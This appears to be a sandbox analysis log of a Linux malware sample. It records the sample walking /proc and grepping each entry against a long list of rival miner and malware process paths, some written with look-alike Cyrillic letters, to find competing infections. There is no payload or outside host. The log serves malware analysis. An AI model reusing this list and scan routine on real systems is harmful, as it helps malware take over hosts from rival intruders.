/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1199
-
-
/bin/grepgrep exe2⤵PID:1202
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1201
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1204
-
-
/bin/grepgrep exe2⤵PID:1207
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1206
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1209
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1211
-
-
/bin/grepgrep exe2⤵PID:1212
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1214
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1216
-
-
/bin/grepgrep exe2⤵PID:1217
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1219
-
-
/bin/grepgrep exe2⤵PID:1222
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1221
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1224
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1227
-
-
/bin/grepgrep exe2⤵PID:1228
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1230
-
-
/bin/grepgrep exe2⤵PID:1233
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1232
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1235
-
-
/bin/grepgrep exe2⤵PID:1238
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1237
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1240
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1242
-
-
/bin/grepgrep exe2⤵PID:1243
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1245
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1247
-
-
/bin/grepgrep exe2⤵PID:1248
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1250
-
-
/bin/grepgrep exe2⤵PID:1253
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1252
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1255
-
-
/bin/grepgrep exe2⤵PID:1258
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1257
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1260
-
-
/bin/grepgrep exe2⤵PID:1263
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1262
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1265
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1267
-
-
/bin/grepgrep exe2⤵PID:1268
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1270
-
-
/bin/grepgrep exe2⤵PID:1273
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1272
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1275
-
-
/bin/lsls -latrh /proc/mtd2⤵PID:1277
-
-
/bin/grepgrep exe2⤵PID:1278
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1280
-
-
/bin/grepgrep exe2⤵PID:1283
-
-
/bin/lsls -latrh /proc/net2⤵PID:1282
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1285
-
-
/bin/grepgrep exe2⤵PID:1288
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1287
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1290
-
-
/bin/grepgrep exe2⤵PID:1293
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1292
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1295
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1297
-
-
/bin/grepgrep exe2⤵PID:1298
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1300
-
-
/bin/grepgrep exe2⤵PID:1303
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1302
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1305
-
-
/bin/grepgrep exe2⤵PID:1308
-
-
/bin/lsls -latrh /proc/self2⤵PID:1307
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1310
-
-
/bin/grepgrep exe2⤵PID:1313
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1312
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1315
-
-
/bin/grepgrep exe2⤵PID:1318
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1317
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1320
-
-
/bin/grepgrep exe2⤵PID:1323
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1322
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1325
-
-
/bin/grepgrep exe2⤵PID:1328
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1327
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1330
-
-
/bin/grepgrep exe2⤵PID:1333
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1332
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1335
-
-
/bin/grepgrep exe2⤵PID:1338
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1337
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1340
-
-
/bin/grepgrep exe2⤵PID:1343
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1342
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1345
-
-
/bin/grepgrep exe2⤵PID:1348
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1347
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1350
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1355
-
-
/bin/grepgrep exe2⤵PID:1358
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1357
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1363
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1362
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1365
-
-
/bin/grepgrep exe2⤵PID:1368
-
-
/bin/lsls -latrh /proc/version2⤵PID:1367
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1370
-
-
/bin/grepgrep exe2⤵PID:1373
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1372
-
-
